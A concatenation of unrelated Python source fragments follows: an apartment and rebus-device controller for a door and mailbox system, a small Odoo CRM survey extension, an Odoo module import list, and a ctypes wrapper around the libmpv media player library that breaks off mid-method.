        # Set later via set_rebus_controller(); while None, saves/updates
        # that touch rebus ids raise a StateException.
        self.rebus_controller = None  # type: Optional[RebusController]

    def set_rebus_controller(self, rebus_controller):
        """Inject the rebus controller used to verify mailbox/doorbell ids."""
        self.rebus_controller = rebus_controller

    @staticmethod
    @Inject
    def send_config_change_event(msg, error=EventError.ErrorTypes.NO_ERROR, pubsub=INJECTED):
        # type: (str, Dict[str, Any], PubSub) -> None
        # NOTE(review): the type comment declares 'error' as Dict[str, Any],
        # but the default is EventError.ErrorTypes.NO_ERROR — confirm intended type.
        # Publishes an apartment CONFIG_CHANGE event on the CONFIG topic.
        event = EsafeEvent(EsafeEvent.Types.CONFIG_CHANGE, {'type': 'apartment', 'msg': msg}, error=error)
        pubsub.publish_esafe_event(PubSub.EsafeTopics.CONFIG, event)

    @staticmethod
    def load_apartment(apartment_id):
        # type: (int) -> Optional[ApartmentDTO]
        """Return the apartment with the given id, or None if not found."""
        apartment_orm = Apartment.select().where(Apartment.id == apartment_id).first()
        if apartment_orm is None:
            return None
        apartment_dto = ApartmentMapper.orm_to_dto(apartment_orm)
        return apartment_dto

    @staticmethod
    def load_apartment_by_mailbox_id(mailbox_id):
        # type: (int) -> Optional[ApartmentDTO]
        """Return the apartment whose mailbox rebus id matches, or None."""
        apartment_orm = Apartment.select().where(Apartment.mailbox_rebus_id == mailbox_id).first()
        if apartment_orm is None:
            return None
        apartment_dto = ApartmentMapper.orm_to_dto(apartment_orm)
        return apartment_dto

    @staticmethod
    def load_apartment_by_doorbell_id(doorbell_id):
        # type: (int) -> Optional[ApartmentDTO]
        """Return the apartment whose doorbell rebus id matches, or None."""
        apartment_orm = Apartment.select().where(Apartment.doorbell_rebus_id == doorbell_id).first()
        if apartment_orm is None:
            return None
        apartment_dto = ApartmentMapper.orm_to_dto(apartment_orm)
        return apartment_dto

    @staticmethod
    def load_apartments():
        # type: () -> List[ApartmentDTO]
        """Return all apartments as DTOs."""
        apartments = []
        for apartment_orm in Apartment.select():
            apartment_dto = ApartmentMapper.orm_to_dto(apartment_orm)
            apartments.append(apartment_dto)
        return apartments

    @staticmethod
    def get_apartment_count():
        # type: () -> int
        """Return the number of apartments in the database."""
        return Apartment.select().count()

    @staticmethod
    def apartment_id_exists(apartment_id):
        # type: (int) -> bool
        """Return True when an apartment with the given id exists."""
        apartments = ApartmentController.load_apartments()
        ids = (x.id for x in apartments)
        return apartment_id in ids

    def _check_rebus_ids(self, apartment_dto):
        # Validates that any mailbox/doorbell rebus ids set on the DTO refer
        # to devices known by the rebus controller; raises otherwise.
        if self.rebus_controller is None:
            raise StateException("Cannot save apartment: Rebus Controller is None")
        if 'doorbell_rebus_id' in apartment_dto.loaded_fields and \
                not self.rebus_controller.verify_device_exists(apartment_dto.doorbell_rebus_id):
            raise ItemDoesNotExistException("Cannot save apartment: doorbell ({}) does not exists".format(apartment_dto.doorbell_rebus_id))
        if 'mailbox_rebus_id' in apartment_dto.loaded_fields and \
                not self.rebus_controller.verify_device_exists(apartment_dto.mailbox_rebus_id):
            raise ItemDoesNotExistException("Cannot save apartment: mailbox ({}) does not exists".format(apartment_dto.mailbox_rebus_id))

    def save_apartment(self, apartment_dto, send_event=True):
        # type: (ApartmentDTO, bool) -> ApartmentDTO
        """Persist a new apartment; optionally publish a 'save' config event."""
        self._check_rebus_ids(apartment_dto)
        apartment_orm = ApartmentMapper.dto_to_orm(apartment_dto)
        apartment_orm.save()
        if send_event:
            ApartmentController.send_config_change_event('save')
        return ApartmentMapper.orm_to_dto(apartment_orm)

    def save_apartments(self, apartments_dto):
        """Persist multiple apartments, publishing one 'save' event at the end."""
        apartments_dtos = []
        for apartment in apartments_dto:
            apartment_saved = self.save_apartment(apartment, send_event=False)
            apartments_dtos.append(apartment_saved)
        self.send_config_change_event('save')
        return apartments_dtos

    def update_apartment(self, apartment_dto, send_event=True):
        # type: (ApartmentDTO, bool) -> ApartmentDTO
        """Update an existing apartment (id required); only loaded fields are
        overwritten. Optionally publishes an 'update' config event."""
        self._check_rebus_ids(apartment_dto)
        if 'id' not in apartment_dto.loaded_fields or apartment_dto.id is None:
            raise RuntimeError('cannot update an apartment without the id being set')
        try:
            apartment_orm = Apartment.get_by_id(apartment_dto.id)
            loaded_apartment_dto = ApartmentMapper.orm_to_dto(apartment_orm)
            for field in apartment_dto.loaded_fields:
                if field == 'id':
                    continue
                if hasattr(apartment_dto, field):
                    setattr(loaded_apartment_dto, field, getattr(apartment_dto, field))
            apartment_orm = ApartmentMapper.dto_to_orm(loaded_apartment_dto)
            apartment_orm.save()
            if send_event:
                ApartmentController.send_config_change_event('update')
            return ApartmentMapper.orm_to_dto(apartment_orm)
        except Exception as e:
            raise RuntimeError('Could not update the user: {}'.format(e))

    def update_apartments(self, apartment_dtos):
        # type: (List[ApartmentDTO]) -> Optional[List[ApartmentDTO]]
        """Update multiple apartments atomically; returns None (and rolls the
        transaction back) when any update fails."""
        apartments = []
        with Database.get_db().transaction() as transaction:
            try:
                # First clear all the rebus fields in order to be able to swap 2 fields
                for apartment in apartment_dtos:
                    apartment_orm = Apartment.get_by_id(apartment.id)  # type: Apartment
                    if 'mailbox_rebus_id' in apartment.loaded_fields:
                        apartment_orm.mailbox_rebus_id = None
                    if 'doorbell_rebus_id' in apartment.loaded_fields:
                        apartment_orm.doorbell_rebus_id = None
                    apartment_orm.save()

                # Then check if there is already an apartment with an mailbox or doorbell rebus id that is passed
                # This is needed for when an doorbell or mailbox gets assigned to another apartment. Then the first assignment needs to be deleted.
                for apartment_orm in Apartment.select():
                    for apartment_dto in apartment_dtos:
                        if apartment_orm.mailbox_rebus_id == apartment_dto.mailbox_rebus_id and apartment_orm.mailbox_rebus_id is not None:
                            apartment_orm.mailbox_rebus_id = None
                            apartment_orm.save()
                        if apartment_orm.doorbell_rebus_id == apartment_dto.doorbell_rebus_id and apartment_orm.doorbell_rebus_id is not None:
                            apartment_orm.doorbell_rebus_id = None
                            apartment_orm.save()

                for apartment in apartment_dtos:
                    updated = self.update_apartment(apartment, send_event=False)
                    if updated is not None:
                        apartments.append(updated)
                self.send_config_change_event('update')
            except Exception as ex:
                logger.error('Could not update apartments: {}: {}'.format(type(ex).__name__, ex))
                transaction.rollback()
                return None
        return apartments


    @staticmethod
    def delete_apartment(apartment_dto):
        # type: (ApartmentDTO) -> None
        """Delete an apartment by id, or by name when the name is unique.
        Raises RuntimeError when neither uniquely identifies a row."""
        if "id" in apartment_dto.loaded_fields and apartment_dto.id is not None:
            Apartment.delete_by_id(apartment_dto.id)
        elif "name" in apartment_dto.loaded_fields:
            # First check if there is only one:
            if Apartment.select().where(Apartment.name == apartment_dto.name).count() <= 1:
                Apartment.delete().where(Apartment.name == apartment_dto.name).execute()
                ApartmentController.send_config_change_event('delete')
            else:
                raise RuntimeError('More than one apartment with the given name: {}'.format(apartment_dto.name))
        else:
            raise RuntimeError('Could not find an apartment with the name {} to delete'.format(apartment_dto.name))

from odoo import fields, models


class Job(models.Model):
    """Extend CRM teams with an optional interview form (a survey)."""

    _inherit = "crm.team"

    survey_id = fields.Many2one(
        'survey.survey', "Interview Form",
        help="Choose an interview form")

    def action_print_survey(self):
        """Delegate printing to the linked survey's own print action."""
        survey = self.survey_id
        return survey.action_print_survey()

##############################################################################
# For copyright and license notices, see __manifest__.py file in module root
# directory
##############################################################################
from . import account_move
from . import account_move_line
from . import account_master_port


from ctypes import *
import ctypes.util
import threading
import os
import sys
from warnings import warn
from functools import partial
import collections
import re
import traceback

# vim: ts=4 sw=4 et

# Locate and load the libmpv shared library; also record the filesystem
# encoding used later to encode path arguments passed to mpv.
if os.name == 'nt':
    # Windows: expect the mpv DLL next to the script or on PATH.
    backend = CDLL('mpv-1.dll')
    fs_enc = 'utf-8'
else:
    import locale
    lc, enc = locale.getlocale(locale.LC_NUMERIC)
    # libmpv requires LC_NUMERIC to be set to "C". Since messing with global variables everyone else relies upon is
    # still better than segfaulting, we are setting LC_NUMERIC to "C".
    locale.setlocale(locale.LC_NUMERIC, 'C')

    sofile = ctypes.util.find_library('mpv')
    if sofile is None:
        raise OSError("Cannot find libmpv in the usual places. Depending on your distro, you may try installing an "
                "mpv-devel or mpv-libs package. If you have libmpv around but this script can't find it, maybe consult "
                "the documentation for ctypes.util.find_library which this script uses to look up the library "
                "filename.")
    backend = CDLL(sofile)
    fs_enc = sys.getfilesystemencoding()


class MpvHandle(c_void_p):
    """Opaque pointer type for an mpv client context (mpv_handle*)."""

class MpvOpenGLCbContext(c_void_p):
    """Opaque pointer type for an mpv opengl-cb sub-API context."""


class PropertyUnavailableError(AttributeError):
    """Raised when an mpv property exists but currently holds no value."""

class ErrorCode(object):
    """ For documentation on these, see mpv's libmpv/client.h """
    SUCCESS                 = 0
    EVENT_QUEUE_FULL        = -1
    NOMEM                   = -2
    UNINITIALIZED           = -3
    INVALID_PARAMETER       = -4
    OPTION_NOT_FOUND        = -5
    OPTION_FORMAT           = -6
    OPTION_ERROR            = -7
    PROPERTY_NOT_FOUND      = -8
    PROPERTY_FORMAT         = -9
    PROPERTY_UNAVAILABLE    = -10
    PROPERTY_ERROR          = -11
    COMMAND                 = -12

    # Maps each error code to a factory producing a suitable Python exception;
    # the None entry for 0 means "success, nothing to raise".
    EXCEPTION_DICT = {
        0:   None,
        -1:  lambda *a: MemoryError('mpv event queue full', *a),
        -2:  lambda *a: MemoryError('mpv cannot allocate memory', *a),
        -3:  lambda *a: ValueError('Uninitialized mpv handle used', *a),
        -4:  lambda *a: ValueError('Invalid value for mpv parameter', *a),
        -5:  lambda *a: AttributeError('mpv option does not exist', *a),
        -6:  lambda *a: TypeError('Tried to set mpv option using wrong format', *a),
        -7:  lambda *a: ValueError('Invalid value for mpv option', *a),
        -8:  lambda *a: AttributeError('mpv property does not exist', *a),
        # Currently (mpv 0.18.1) there is a bug causing a PROPERTY_FORMAT error to be returned instead of
        # INVALID_PARAMETER when setting a property-mapped option to an invalid value.
        -9:  lambda *a: TypeError('Tried to get/set mpv property using wrong format, or passed invalid value', *a),
        -10: lambda *a: PropertyUnavailableError('mpv property is not available', *a),
        -11: lambda *a: RuntimeError('Generic error getting or setting mpv property', *a),
        -12: lambda *a: SystemError('Error running mpv command', *a),
    }

    @staticmethod
    def default_error_handler(ec, *args):
        """Fallback for codes missing from EXCEPTION_DICT: ask libmpv for text."""
        return ValueError(_mpv_error_string(ec).decode('utf-8'), ec, *args)

    @classmethod
    def raise_for_ec(cls, ec, func, *args):
        """Raise the exception matching return code *ec* if it denotes an error.

        Positive codes are success values and are treated like 0 (no raise).
        """
        if ec > 0:
            ec = 0
        exc_factory = cls.EXCEPTION_DICT.get(ec, cls.default_error_handler)
        if exc_factory:
            raise exc_factory(ec, *args)


class MpvFormat(c_int):
    """Data format discriminator for mpv properties and nodes (mpv_format)."""
    NONE        = 0
    STRING      = 1
    OSD_STRING  = 2
    FLAG        = 3
    INT64       = 4
    DOUBLE      = 5
    NODE        = 6
    NODE_ARRAY  = 7
    NODE_MAP    = 8
    BYTE_ARRAY  = 9

    def __eq__(self, other):
        # Equal to other MpvFormat instances and to plain ints of the same value.
        return self is other or self.value == other or self.value == int(other)

    # BUGFIX: defining __eq__ implicitly sets __hash__ = None in Python 3,
    # making instances unhashable. Hash by value so hashing stays consistent
    # with __eq__ (MpvFormat(n) hashes like the int n).
    def __hash__(self):
        return hash(self.value)

    def __repr__(self):
        return ['NONE', 'STRING', 'OSD_STRING', 'FLAG', 'INT64', 'DOUBLE', 'NODE', 'NODE_ARRAY', 'NODE_MAP',
                'BYTE_ARRAY'][self.value]



class MpvEventID(c_int):
    """Numeric identifiers for mpv events (mpv_event_id)."""
    NONE                    = 0
    SHUTDOWN                = 1
    LOG_MESSAGE             = 2
    GET_PROPERTY_REPLY      = 3
    SET_PROPERTY_REPLY      = 4
    COMMAND_REPLY           = 5
    START_FILE              = 6
    END_FILE                = 7
    FILE_LOADED             = 8
    TRACKS_CHANGED          = 9
    TRACK_SWITCHED          = 10
    IDLE                    = 11
    PAUSE                   = 12
    UNPAUSE                 = 13
    TICK                    = 14
    SCRIPT_INPUT_DISPATCH   = 15
    CLIENT_MESSAGE          = 16
    VIDEO_RECONFIG          = 17
    AUDIO_RECONFIG          = 18
    METADATA_UPDATE         = 19
    SEEK                    = 20
    PLAYBACK_RESTART        = 21
    PROPERTY_CHANGE         = 22
    CHAPTER_CHANGE          = 23

    # Every real event id, i.e. everything except NONE.
    ANY = (SHUTDOWN, LOG_MESSAGE, GET_PROPERTY_REPLY, SET_PROPERTY_REPLY, COMMAND_REPLY, START_FILE, END_FILE,
           FILE_LOADED, TRACKS_CHANGED, TRACK_SWITCHED, IDLE, PAUSE, UNPAUSE, TICK, SCRIPT_INPUT_DISPATCH,
           CLIENT_MESSAGE, VIDEO_RECONFIG, AUDIO_RECONFIG, METADATA_UPDATE, SEEK, PLAYBACK_RESTART, PROPERTY_CHANGE,
           CHAPTER_CHANGE)

    def __repr__(self):
        names = ('NONE', 'SHUTDOWN', 'LOG_MESSAGE', 'GET_PROPERTY_REPLY', 'SET_PROPERTY_REPLY', 'COMMAND_REPLY',
                 'START_FILE', 'END_FILE', 'FILE_LOADED', 'TRACKS_CHANGED', 'TRACK_SWITCHED', 'IDLE', 'PAUSE',
                 'UNPAUSE', 'TICK', 'SCRIPT_INPUT_DISPATCH', 'CLIENT_MESSAGE', 'VIDEO_RECONFIG', 'AUDIO_RECONFIG',
                 'METADATA_UPDATE', 'SEEK', 'PLAYBACK_RESTART', 'PROPERTY_CHANGE', 'CHAPTER_CHANGE')
        return names[self.value]


class MpvNodeList(Structure):
    """ctypes view of an mpv_node_list; its _fields_ are attached later,
    after MpvNode exists (the two types reference each other)."""

    def array_value(self, decode_str=False):
        """Convert the node list into a plain Python list of node values."""
        result = []
        for index in range(self.num):
            result.append(self.values[index].node_value(decode_str))
        return result

    def dict_value(self, decode_str=False):
        """Convert the key/value node pairs into a plain Python dict."""
        result = {}
        for index in range(self.num):
            result[self.keys[index].decode('utf-8')] = self.values[index].node_value(decode_str)
        return result

class MpvNode(Structure):
    """ctypes view of an mpv_node: a tagged union of 'val' plus its 'format'."""
    _fields_ = [('val', c_longlong),
                ('format', MpvFormat)]

    def node_value(self, decode_str=False):
        """Unpack this node's payload into a plain Python value."""
        return MpvNode.node_cast_value(byref(c_void_p(self.val)), self.format.value, decode_str)

    @staticmethod
    def node_cast_value(v, fmt, decode_str=False):
        """Cast pointer *v* according to *fmt* and convert it to a Python value.

        With decode_str, STRING payloads are decoded from UTF-8 to str
        (OSD_STRING is always decoded). Unknown formats raise KeyError.
        Nested NODE/NODE_ARRAY/NODE_MAP values recurse with the same flag.
        """
        dwrap = lambda s: s.decode('utf-8') if decode_str else s
        return {
            MpvFormat.NONE:         lambda v: None,
            MpvFormat.STRING:       lambda v: dwrap(cast(v, POINTER(c_char_p)).contents.value),
            MpvFormat.OSD_STRING:   lambda v: cast(v, POINTER(c_char_p)).contents.value.decode('utf-8'),
            MpvFormat.FLAG:         lambda v: bool(cast(v, POINTER(c_int)).contents.value),
            MpvFormat.INT64:        lambda v: cast(v, POINTER(c_longlong)).contents.value,
            MpvFormat.DOUBLE:       lambda v: cast(v, POINTER(c_double)).contents.value,
            MpvFormat.NODE:         lambda v: cast(v, POINTER(MpvNode)).contents.node_value(decode_str),
            MpvFormat.NODE_ARRAY:   lambda v: cast(v, POINTER(POINTER(MpvNodeList))).contents.contents.array_value(decode_str),
            MpvFormat.NODE_MAP:     lambda v: cast(v, POINTER(POINTER(MpvNodeList))).contents.contents.dict_value(decode_str),
            MpvFormat.BYTE_ARRAY:   lambda v: cast(v, POINTER(c_char_p)).contents.value,
            }[fmt](v)

# MpvNodeList and MpvNode reference each other, so the field layout of
# MpvNodeList is attached only now that MpvNode is defined.
MpvNodeList._fields_ = [('num', c_int),
                        ('values', POINTER(MpvNode)),
                        ('keys', POINTER(c_char_p))]

class MpvSubApi(c_int):
    """Identifiers for mpv sub-APIs obtainable via mpv_get_sub_api."""
    MPV_SUB_API_OPENGL_CB   = 1

class MpvEvent(Structure):
    """ctypes view of an mpv_event struct."""
    _fields_ = [('event_id', MpvEventID),
                ('error', c_int),
                ('reply_userdata', c_ulonglong),
                ('data', c_void_p)]

    def as_dict(self):
        """Copy the event (and any known payload struct) out of ctypes memory
        into a plain dict. Events with unknown payloads get event=None."""
        # Built lazily here because the payload classes are defined below.
        payload_types = {
            MpvEventID.END_FILE:              MpvEventEndFile,
            MpvEventID.PROPERTY_CHANGE:       MpvEventProperty,
            MpvEventID.GET_PROPERTY_REPLY:    MpvEventProperty,
            MpvEventID.LOG_MESSAGE:           MpvEventLogMessage,
            MpvEventID.SCRIPT_INPUT_DISPATCH: MpvEventScriptInputDispatch,
            MpvEventID.CLIENT_MESSAGE:        MpvEventClientMessage,
        }
        payload_type = payload_types.get(self.event_id.value)
        if payload_type:
            payload = cast(self.data, POINTER(payload_type)).contents.as_dict()
        else:
            payload = None
        return {'event_id': self.event_id.value,
                'error': self.error,
                'reply_userdata': self.reply_userdata,
                'event': payload}

class MpvEventProperty(Structure):
    """ctypes view of an mpv_event_property payload."""
    _fields_ = [('name', c_char_p),
                ('format', MpvFormat),
                ('data', c_void_p)]

    def as_dict(self):
        """Decode the property event into a dict; STRING-format payloads
        additionally get a converted 'value' entry."""
        result = {'name': self.name.decode('utf-8'),
                  'format': self.format,
                  'data': self.data}
        if self.format.value == MpvFormat.STRING:
            # Look up the property's python-side type; unknown names fall back to str.
            proptype, _access = ALL_PROPERTIES.get(self.name, (str, None))
            raw = cast(self.data, POINTER(c_char_p)).contents.value
            result['value'] = proptype(raw.decode('utf-8'))
        return result

class MpvEventLogMessage(Structure):
    """ctypes view of an mpv_event_log_message payload."""
    _fields_ = [('prefix', c_char_p),
                ('level', c_char_p),
                ('text', c_char_p)]

    def as_dict(self):
        """Decode the message fields; trailing whitespace (the newline mpv
        appends) is stripped from the text."""
        return {'prefix': self.prefix.decode('utf-8'),
                'level': self.level.decode('utf-8'),
                'text': self.text.decode('utf-8').rstrip()}

class MpvEventEndFile(c_int):
    """End-of-file event payload; the int value encodes why playback ended."""
    EOF_OR_INIT_FAILURE = 0
    RESTARTED           = 1
    ABORTED             = 2
    QUIT                = 3

    def as_dict(self):
        """Expose the termination reason under a 'reason' key."""
        return {'reason': self.value}

class MpvEventScriptInputDispatch(Structure):
    """ctypes view of an mpv_event_script_input_dispatch payload."""
    _fields_ = [('arg0', c_int),
                ('type', c_char_p)]

    def as_dict(self):
        """Decoding is not implemented upstream yet; intentionally yields None."""
        return None  # TODO

class MpvEventClientMessage(Structure):
    """ctypes view of an mpv_event_client_message payload."""
    _fields_ = [('num_args', c_int),
                ('args', POINTER(c_char_p))]

    def as_dict(self):
        """Decode the argv-style argument array into a list of str."""
        decoded = []
        for index in range(self.num_args):
            decoded.append(self.args[index].decode('utf-8'))
        return {'args': decoded}

# Signature of the callback registered via mpv_set_wakeup_callback.
WakeupCallback = CFUNCTYPE(None, c_void_p)

# Callback signatures used by the opengl-cb sub-API.
OpenGlCbUpdateFn = CFUNCTYPE(None, c_void_p)
OpenGlCbGetProcAddrFn = CFUNCTYPE(None, c_void_p, c_char_p)

def _handle_func(name, args, restype, errcheck, ctx=MpvHandle):
    """Look up *name* in the loaded libmpv, configure its ctypes signature,
    and publish it at module level under a leading underscore.

    When *ctx* is set, it is prepended to the argument types (most mpv calls
    take the handle first); restype/errcheck are applied only if given.
    """
    func = getattr(backend, name)
    if ctx:
        func.argtypes = [ctx] + args
    else:
        func.argtypes = args
    if restype is not None:
        func.restype = restype
    if errcheck is not None:
        func.errcheck = errcheck
    globals()['_' + name] = func

def bytes_free_errcheck(res, func, *args):
    """errcheck handler for calls returning an mpv-allocated buffer: reject
    NULL, copy the pointer value out, then return the buffer via mpv_free."""
    notnull_errcheck(res, func, *args)
    value = cast(res, c_void_p).value
    _mpv_free(res)
    return value

def notnull_errcheck(res, func, *args):
    """errcheck handler that rejects NULL results from libmpv calls.

    Returns *res* unchanged when it is non-NULL; raises RuntimeError naming
    the failing function and its arguments otherwise.
    """
    if res is None:
        # BUGFIX: the implicitly-concatenated literals were missing the space
        # between "returned." and "Please", garbling the message.
        raise RuntimeError('Underspecified error in MPV when calling {} with args {!r}: NULL pointer returned. '
                'Please consult your local debugger.'.format(func.__name__, args))
    return res

# Shared errcheck handler: raises the mapped exception for negative mpv codes.
ec_errcheck = ErrorCode.raise_for_ec

def _handle_gl_func(name, args=None, restype=None):
    """Register an opengl-cb sub-API function: like _handle_func, but with the
    MpvOpenGLCbContext handle type and no errcheck handler.

    BUGFIX: ``args`` previously defaulted to a shared mutable list ([]); a
    fresh list is now substituted per call.
    """
    _handle_func(name, [] if args is None else args, restype, errcheck=None, ctx=MpvOpenGLCbContext)

backend.mpv_client_api_version.restype = c_ulong
def _mpv_client_api_version():
    """Return the libmpv client API version as a (major, minor) tuple."""
    packed = backend.mpv_client_api_version()
    # Major version in the high 16 bits, minor in the low 16 bits.
    return packed >> 16, packed & 0xFFFF

# These few functions are bound by hand because they do not take an MpvHandle
# as their first argument and so do not fit the _handle_func helper.
backend.mpv_free.argtypes = [c_void_p]
_mpv_free = backend.mpv_free

backend.mpv_free_node_contents.argtypes = [c_void_p]
_mpv_free_node_contents = backend.mpv_free_node_contents

backend.mpv_create.restype = MpvHandle
_mpv_create = backend.mpv_create

# Bind the libmpv C API: each call publishes a module-level _mpv_* function
# with the given argument types, return type and errcheck handler.

# Handle lifecycle and global state.
_handle_func('mpv_create_client',           [c_char_p],                                 MpvHandle, notnull_errcheck)
_handle_func('mpv_client_name',             [],                                         c_char_p, errcheck=None)
_handle_func('mpv_initialize',              [],                                         c_int, ec_errcheck)
_handle_func('mpv_detach_destroy',          [],                                         None, errcheck=None)
_handle_func('mpv_terminate_destroy',       [],                                         None, errcheck=None)
_handle_func('mpv_load_config_file',        [c_char_p],                                 c_int, ec_errcheck)
_handle_func('mpv_suspend',                 [],                                         None, errcheck=None)
_handle_func('mpv_resume',                  [],                                         None, errcheck=None)
_handle_func('mpv_get_time_us',             [],                                         c_ulonglong, errcheck=None)

# Options.
_handle_func('mpv_set_option',              [c_char_p, MpvFormat, c_void_p],            c_int, ec_errcheck)
_handle_func('mpv_set_option_string',       [c_char_p, c_char_p],                       c_int, ec_errcheck)

# Commands.
_handle_func('mpv_command',                 [POINTER(c_char_p)],                        c_int, ec_errcheck)
_handle_func('mpv_command_string',          [c_char_p, c_char_p],                       c_int, ec_errcheck)
_handle_func('mpv_command_async',           [c_ulonglong, POINTER(c_char_p)],           c_int, ec_errcheck)

# Properties (synchronous, asynchronous, and observation).
_handle_func('mpv_set_property',            [c_char_p, MpvFormat, c_void_p],            c_int, ec_errcheck)
_handle_func('mpv_set_property_string',     [c_char_p, c_char_p],                       c_int, ec_errcheck)
_handle_func('mpv_set_property_async',      [c_ulonglong, c_char_p, MpvFormat,c_void_p],c_int, ec_errcheck)
_handle_func('mpv_get_property',            [c_char_p, MpvFormat, c_void_p],            c_int, ec_errcheck)
_handle_func('mpv_get_property_string',     [c_char_p],                                 c_void_p, bytes_free_errcheck)
_handle_func('mpv_get_property_osd_string', [c_char_p],                                 c_void_p, bytes_free_errcheck)
_handle_func('mpv_get_property_async',      [c_ulonglong, c_char_p, MpvFormat],         c_int, ec_errcheck)
_handle_func('mpv_observe_property',        [c_ulonglong, c_char_p, MpvFormat],         c_int, ec_errcheck)
_handle_func('mpv_unobserve_property',      [c_ulonglong],                              c_int, ec_errcheck)

# Context-free helpers (no MpvHandle argument).
_handle_func('mpv_event_name',              [c_int],                                    c_char_p, errcheck=None, ctx=None)
_handle_func('mpv_error_string',            [c_int],                                    c_char_p, errcheck=None, ctx=None)

# Event queue.
_handle_func('mpv_request_event',           [MpvEventID, c_int],                        c_int, ec_errcheck)
_handle_func('mpv_request_log_messages',    [c_char_p],                                 c_int, ec_errcheck)
_handle_func('mpv_wait_event',              [c_double],                                 POINTER(MpvEvent), errcheck=None)
_handle_func('mpv_wakeup',                  [],                                         None, errcheck=None)
_handle_func('mpv_set_wakeup_callback',     [WakeupCallback, c_void_p],                 None, errcheck=None)
_handle_func('mpv_get_wakeup_pipe',         [],                                         c_int, errcheck=None)

_handle_func('mpv_get_sub_api',             [MpvSubApi],                                c_void_p, notnull_errcheck)

# opengl-cb sub-API (takes an MpvOpenGLCbContext instead of an MpvHandle).
_handle_gl_func('mpv_opengl_cb_set_update_callback',    [OpenGlCbUpdateFn, c_void_p])
_handle_gl_func('mpv_opengl_cb_init_gl',                [c_char_p, OpenGlCbGetProcAddrFn, c_void_p],    c_int)
_handle_gl_func('mpv_opengl_cb_draw',                   [c_int, c_int, c_int],                          c_int)
_handle_gl_func('mpv_opengl_cb_render',                 [c_int, c_int],                                 c_int)
_handle_gl_func('mpv_opengl_cb_report_flip',            [c_ulonglong],                                  c_int)
_handle_gl_func('mpv_opengl_cb_uninit_gl',              [],                                             c_int)


def _ensure_encoding(possibly_bytes):
    return possibly_bytes.decode('utf-8') if type(possibly_bytes) is bytes else possibly_bytes


def _event_generator(handle):
    """Yield mpv events for *handle* until a NONE event signals the end.

    Blocks indefinitely inside mpv_wait_event between events.
    """
    while True:
        event = _mpv_wait_event(handle, -1).contents
        if event.event_id.value == MpvEventID.NONE:
            # BUGFIX (PEP 479): raising StopIteration inside a generator turns
            # into RuntimeError on Python 3.7+; a plain return ends iteration.
            return
        yield event

def load_lua():
    """ Use this function if you intend to use mpv's built-in lua interpreter. This is e.g. needed for playback of
    youtube urls. """
    # RTLD_GLOBAL makes liblua's symbols visible to libmpv's lua scripting.
    CDLL('liblua.so', mode=RTLD_GLOBAL)


def _event_loop(event_handle, playback_cond, event_callbacks, message_handlers, property_handlers, log_handler):
    """Event-dispatch loop run on the MPV background thread.

    Pulls events off *event_handle* and fans them out: every event goes to all
    *event_callbacks*; property changes to *property_handlers*, log messages to
    *log_handler*, client messages to *message_handlers*. SHUTDOWN/END_FILE
    wake waiters on *playback_cond*; SHUTDOWN also ends the loop.
    """
    for event in _event_generator(event_handle):
        try:
            devent = event.as_dict() # copy data from ctypes
            eid = devent['event_id']
            for callback in event_callbacks:
                callback(devent)
            if eid in (MpvEventID.SHUTDOWN, MpvEventID.END_FILE):
                with playback_cond:
                    playback_cond.notify_all()
            if eid == MpvEventID.PROPERTY_CHANGE:
                pc = devent['event']
                name = pc['name']

                # Pick handler arguments depending on how the payload arrived:
                # decoded string value, no value at all, or raw data+format.
                if 'value' in pc:
                    proptype, _access = ALL_PROPERTIES[name]
                    if proptype is bytes:
                        args = (pc['value'],)
                    else:
                        args = (proptype(_ensure_encoding(pc['value'])),)
                elif pc['format'] == MpvFormat.NONE:
                    args = (None,)
                else:
                    args = (pc['data'], pc['format'])

                for handler in property_handlers[name]:
                    handler(*args)
            if eid == MpvEventID.LOG_MESSAGE and log_handler is not None:
                ev = devent['event']
                log_handler(ev['level'], ev['prefix'], ev['text'])
            if eid == MpvEventID.CLIENT_MESSAGE:
                # {'event': {'args': ['key-binding', 'foo', 'u-', 'g']}, 'reply_userdata': 0, 'error': 0, 'event_id': 16}
                target, *args = devent['event']['args']
                if target in message_handlers:
                    message_handlers[target](*args)
            if eid == MpvEventID.SHUTDOWN:
                _mpv_detach_destroy(event_handle)
                return
        except Exception as e:
            # Deliberately broad: a faulty user handler must not kill the
            # event thread; the traceback is printed and the loop continues.
            traceback.print_exc()

class MPV(object):
    """ See man mpv(1) for the details of the implemented commands.

    One instance wraps one mpv core. A dedicated client handle drives the
    event loop (by default on a daemon background thread) and dispatches the
    event/property/message/key-binding handlers registered on this object.
    """
    def __init__(self, *extra_mpv_flags, log_handler=None, start_event_thread=True, **extra_mpv_opts):
        """ Create an MPV instance.

        Extra arguments and extra keyword arguments will be passed to mpv as options. """

        self._event_thread = None
        self.handle = _mpv_create()

        _mpv_set_option_string(self.handle, b'audio-display', b'no')
        istr = lambda o: ('yes' if o else 'no') if type(o) is bool else str(o)
        try:
            for flag in extra_mpv_flags:
                _mpv_set_option_string(self.handle, flag.encode('utf-8'), b'')
            for k, v in extra_mpv_opts.items():
                # Pythonic underscore names map to mpv's dashed option names.
                _mpv_set_option_string(self.handle, k.replace('_', '-').encode('utf-8'), istr(v).encode('utf-8'))
        except AttributeError as e:
            # Initialize anyway so the handle can still be terminated cleanly.
            _mpv_initialize(self.handle)
            raise e
        _mpv_initialize(self.handle)

        self._event_callbacks = []
        self._property_handlers = collections.defaultdict(lambda: [])
        self._message_handlers = {}
        self._key_binding_handlers = {}
        self._playback_cond = threading.Condition()
        self._event_handle = _mpv_create_client(self.handle, b'py_event_handler')
        self._loop = partial(_event_loop, self._event_handle, self._playback_cond, self._event_callbacks,
                self._message_handlers, self._property_handlers, log_handler)
        if start_event_thread:
            self._event_thread = threading.Thread(target=self._loop, name='MPVEventHandlerThread')
            self._event_thread.daemon = True  # modern spelling of deprecated setDaemon(True)
            self._event_thread.start()

        if log_handler is not None:
            self.set_loglevel('terminal-default')

    def wait_for_playback(self):
        """ Waits until playback of the current title is paused or done """
        with self._playback_cond:
            self._playback_cond.wait()

    def wait_for_property(self, name, cond=lambda val: val, level_sensitive=True):
        """Block until property *name* satisfies *cond*. With level_sensitive,
        return immediately if the current value already satisfies it."""
        sema = threading.Semaphore(value=0)
        def observer(val):
            if cond(val):
                sema.release()
        self.observe_property(name, observer)
        if not level_sensitive or not cond(getattr(self, name.replace('-', '_'))):
            sema.acquire()
        self.unobserve_property(name, observer)

    def __del__(self):
        if self.handle:
            self.terminate()

    def terminate(self):
        """Tear down the mpv core; safe to call from the event thread itself."""
        self.handle, handle = None, self.handle
        if threading.current_thread() is self._event_thread:
            # Handle special case to allow event handle to be detached.
